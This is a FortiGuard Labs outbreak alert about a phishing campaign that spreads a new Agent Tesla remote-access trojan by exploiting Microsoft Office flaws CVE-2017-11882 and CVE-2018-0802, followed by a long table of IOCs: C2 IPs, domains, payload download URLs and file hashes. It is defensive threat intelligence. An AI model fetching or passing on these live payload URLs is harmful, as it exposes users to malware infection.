Agent Tesla Malware Attack
High Severity
Microsoft Windows, MS Office(Word/Excel) Platform
Microsoft Vendor
Malware, Attack Type
Watch Video
Agent Tesla Malware Attack Video
Subscribe
New Agent Tesla variant in the wild
FortiGuard Labs captured a phishing campaign that spreads a new Agent Tesla variant. This well-known malware family uses a .Net-based Remote Access Trojan (RAT) and data stealer to gain initial access by exploiting vulnerabilities Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802. The Agent Tesla core module can collect sensitive information from the victim’s device that may include the saved credentials, keylogging information, and device screenshots.. Learn More »
Common Vulnerabilities and Exposures
Background
Agent Tesla made its debut in 2014, and since then, numerous iterations of this malware have been released. This malware employs various tactics to avoid detection, rendering the process of analysis challenging. Agent Tesla is typically spread through phishing emails and has a range of capabilities, including keylogging, screen capture, form-grabbing, and the theft of credentials, among others. Additionally, it has the ability to gather credentials from various software programs, such as Google Chrome, Mozilla Firefox, and Microsoft Outlook, thereby significantly amplifying its potential for causing severe damage.CVE-2017-11882 and CVE-2018-0802 are RCE (Remote Code Execution) vulnerabilities in Microsoft Office that can result in memory corruption inside the EQNEDT32.EXE process. In this particular case, CVE-2017-11882 and CVE-2018-0802 vulnerability is exploited to download and execute the Agent Tesla file on the victim’s device.
Latest Development
Recent news and incidents related to cybersecurity threats encompassing various events such as data breaches, cyber-attacks, security incidents, and vulnerabilities discovered.
July, 2023: During late July this year, FortiGuard labs observed Agent Tesla's new variant being propagated and blocked automatically by Sandbox Behaviour engine. The telemetry shows a total of over 150 thousand blocked counts in July and August 2023.
September 05, 2023: FortiGuard Labs captured a phishing campaign that spreads a new Agent Tesla variant and released a detailed analysis blog on;
https://www.fortinet.com/blog/threat-research/agent-tesla-variant-spread-by-crafted-excel-document
Vulnerabilities (CVE-2017-11882 and CVE-2018-0802) remains popular amongst threat actors, suggesting there are still unpatched devices in the wild, even after over five years. FortiGuard Labs observed and blocked over 3000+ attacks per day, at the IPS level and the number of observed vulnerable devices according to FortiGuard telemetry is around 1300+.
Fortinet customers remain protected from this campaign and other variants of Agent Tesla by FortiGuard’s AntiSPAM, IPS, Web Filtering, AntiVirus services, and Behaviour Engine (AI/ML) services. As mentioned on the released Blog earlier, FortiGuard continue to recommend users and organizations to go through the NSE training: NSE 1 – Information Security Awareness, a module on Internet threats designed to help end users learn how to identify and protect themselves from phishing attacks and other best practices.
Attack Sequence
Actions taken by cyber attacker or a malicious entity to compromise a target system or network.
Attack Sequence
Attack Sequence Video
FortiGuard Cybersecurity Framework
Mitigate security threats and vulnerabilities by leveraging the range of FortiGuard Services.
PROTECT
-
AV
-
Anti-spam
-
Vulnerability
-
AV (Pre-filter)
-
Behavior Detection
-
IPS
-
Web & DNS Filter
-
Botnet C&C
DETECT
-
Outbreak Detection
-
Threat Hunting
-
IOC
-
Content Update
RESPOND
-
Assisted Response Services
-
Automated Response
RECOVER
-
NOC/SOC Training
-
End-User Training
IDENTIFY
-
Vulnerability Management
-
Attack Surface Hardening
-
Business Reputation
AV Detects and blocks the new Agent Tesla malware
Anti-spam Detects unwanted spam from reaching customers inbox
Vulnerability Detects windows endpoints running vulnerable Microsoft Office (CVE-2018-0802, CVE-2017-11882)
AV (Pre-filter) Detects and blocks the new Agent Tesla malware
Behavior Detection Detects unkown/new variants of Agent Tesla malware
IPS Detects and blocks attack attempts to exploit a Code Execution vulnerability in Microsoft Office (CVE-2018-0802, CVE-2017-11882)
Web & DNS Filter Detects and blocks known malicious IPs, Domains and URLs related to Agent Tesla Malware
Botnet C&C Blocks connections channel with known C2 servers associated with Agent Tesla
Outbreak Detection
Threat Hunting
IOC
Content Update
Assisted Response Services Experts to assist you with analysis, containment and response activities.
Automated Response Services that can automaticlly respond to this outbreak.
NOC/SOC Training Train your network and security professionals and optimize your incident response to stay on top of the cyberattacks.
End-User Training Raise security awareness to your employees that are continuously being targetted by phishing, drive-by download and other forms of cyberattacks.
Vulnerability Management Reduce the attack surface on software vulnerabilities via systematic and automated patching.
Attack Surface Hardening Check Security Fabric devices to build actionable configuration recommendations and key indicators.
Business Reputation Know attackers next move to protect against your business branding.
Threat Intelligence
Information gathered from analyzing ongoing cybersecurity events including threat actors, their tactics, techniques, and procedures (TTPs), indicators of compromise (IOCs), malware and related vulnerabilities.
Loading ...
Indicators of compromise
IOC Indicator List
Indicator | Type | Status |
---|---|---|
tttmundo2022.eastus.cloudapp.azure.com | domain | Active |
172.174.176.153 | ip | Active |
193.42.33.51 | ip | Active |
52.152.223.228 | ip | Active |
fdc04dc72884f54a4e553b662f1f186697daf14ef8a2dc3... | file | Active |
36b17c4534e34b6b22728db194292b504cf492ef8ae91f9... | file | Active |
80.76.51.248 | ip | Active |
192.210.175.4 | ip | Active |
104.168.46.25 | ip | Active |
23.95.128.195 | ip | Active |
http://23.95.128.195/3355/chromium.exe | url | Active |
daymon.cc | domain | Active |
http://mail.daymon.cc:587/ | url | Active |
mail.daymon.cc | domain | Active |
3cc739bb1882fc9dbb056f39ebe4965771aeca0ceb44e85... | file | Active |
e418ac2813daadef8ed238148ab1b1037567e1262713161... | file | Active |
1e3e163f9796bf7a5bfd120a3fa29cd1ca5487f740e2b66... | file | Active |
584e458ff9e83bced5806448aa5a1b678002e9c7cc92a48... | file | Active |
5afa7469bccc0b7357d39e8a75cba0a52d44b85de2d9c5a... | file | Active |
b67634b988dfb1f43e7ecd30579fe285e1e57740d646f68... | file | Active |
http://185.225.74.170/realonerealone.txt | url | Active |
185.225.74.170 | ip | Active |
https://api.telegram.org/bot6362373796:AAFAjB2u... | url | Active |
79.110.48.52 | ip | Active |
0618609c8e835c2a6d18499703a3f154 | file | Active |
15b4f37ca12db573ddf20158875b752e | file | Active |
18d0cf3ac6768c183daa36a0dfe5fae1 | file | Active |
192.3.108.47 | ip | Active |
192.3.216.144 | ip | Active |
193.42.33.63 | ip | Active |
1c181452b3185ba3576e48c7dedf51a5 | file | Active |
1d7082a025f82581fdff8bca6a4baefe | file | Active |
39b85ab1c5dddf923bdfaeeb63e933f7 | file | Active |
74468f20f8ee594f9edc6545ee41e5cc | file | Active |
7f36e6c2393dbb894ff926484bdc91e7 | file | Active |
95756212bb9af68227187abd2b465326 | file | Active |
http://104.168.46.25/80o/receipt.vbs | url | Active |
http://104.168.46.25/doc0/3/b1.txt | url | Active |
http://104.168.46.25/QW/ | url | Active |
http://192.3.216.144/456/system_root.vbs | url | Active |
http://192.3.216.144/650/SWISS/ | url | Active |
http://192.3.216.144/650/SWISS/SWISSSWISSSWISSS... | url | Active |
http://192.3.216.144/650/system.vbs | url | Active |
http://192.3.216.144/prow/ | url | Active |
http://192.3.216.144/windows/windwindiwindiwndi... | url | Active |
http://193.42.33.63/aktivooooosssss.vbs | url | Active |
http://23.95.128.195/080/igfxEM.exe | url | Active |
http://23.95.128.195/FGV/1/8O0O0OO0O0o0o0o00o0O... | url | Active |
http://23.95.128.195/FGV/1/8O0O0OO0O0o0o0o00o0O... | url | Active |
http://80.76.51.248/qasx.vbs | url | Active |
http://tttmundo2022.eastus.cloudapp.azure.com/1... | url | Active |
http://tttmundo2022.eastus.cloudapp.azure.com/R... | url | Active |
http://tttmundo2022.eastus.cloudapp.azure.com/R... | url | Active |
https://104.168.46.25/80o/x.vbs | url | Active |
https://104.168.46.25/90o/receipt.vbs | url | Active |
https://104.168.46.25/doc0/ | url | Active |
https://52.152.223.228/ | url | Active |
https://cdn.discordapp.com/attachments/11556522... | url | Active |
0043f65755a700b94a57118a672df82c | file | Active |
00b28f548f14de4f53abd6651bf78b98 | file | Active |
01b02fc9db22a60e8df6530a2e36a73b | file | Active |
05bc545b9b0de1ccb4254b59961ea07b | file | Active |
05d60c7be299fc0220ffcaf3b1482652 | file | Active |
069bb6a37f9312ba4fea6c70b7134d39 | file | Active |
0708c52198a49bc7ab16bce19472598a | file | Active |
08e1955de35005b335be2e100d2d4a3c | file | Active |
092ff92d9bfa9cac81a8b892d495f42e | file | Active |
09f197fc8d69ec14875723f1e6e623bf | file | Active |
0ada110f82ce64fcfab0eb0e5d8d948e | file | Active |
0eba69a4ad399db14a2743b4d68f13e8 | file | Active |
1402e4408f123da1e9bc3bde078764fc | file | Active |
19eab6a97cea19473bda3010066c5990 | file | Active |
1e22cd428f5baf23877a8189469ed92a | file | Active |
201cd0a2fc6a87d25d6aed1e975fae71 | file | Active |
210e9a89b723b3246a7d590c9a428c83 | file | Active |
2123f750f5b854b439349576118d9b9d | file | Active |
25a697d0e6c5fa06eea8ba0d3ae539da | file | Active |
2639c8b09f744e95ba612c89ef26e02c | file | Active |
3247ad04996dd2966800153e7ea14571 | file | Active |
32e9af7d07a5edcc9bf9b5c8121acc55 | file | Active |
38bb6b06907c6e3445aa23c8d229e542 | file | Active |
38f6b4d5804de785b925eb46ddd86d6f | file | Active |
39088a9e4ad3e7a8ba4686641569dbcd | file | Active |
3c3580dfbc1f06636fe5696879cbdd85 | file | Active |
3d8414800762efb9276a999fc477211b | file | Active |
413af1ff38e6a4e205c6f487d042b457 | file | Active |
43ec3cc0836bd759260e8cf120b79a7b | file | Active |
5373b6dce20bbb0218034aa9bf0c20df | file | Active |
5477e3714c953df2bb3addf3bebbda9a | file | Active |
547b88c4aa225377d7d65e912d81fe28 | file | Active |
5630282a95afd2a5ceeecc5acf7ff053 | file | Active |
6bdb7a11d0eaa407e7a7f34d794fb567 | file | Active |
6dfc461ecf4f2fe4c5f44cdeb6792226 | file | Active |
6e0dafacdeee6f2d9463d0052db5cce8 | file | Active |
7b1bc15873c39866b429d44da8640285 | file | Active |
7b6ec969d4110722b427de45ca1c0d42 | file | Active |
7c9ad2b73748f8c745d5d49b9b4876c5 | file | Active |
7ea06a0e6c1e5707a23364ae6984b4f3 | file | Active |
8496654930be3db6cea0ba62ffe5add9 | file | Active |
87aa9fc1bf49d48234160a15515a8145 | file | Active |
Indicators of compromise
IOC Threat Activity
Last 30 days
Chg
Avg 0
Mitre Matrix
Click here for the ATT&CK Matrix
✖
References
Sources of information in support and relation to this Outbreak and vendor.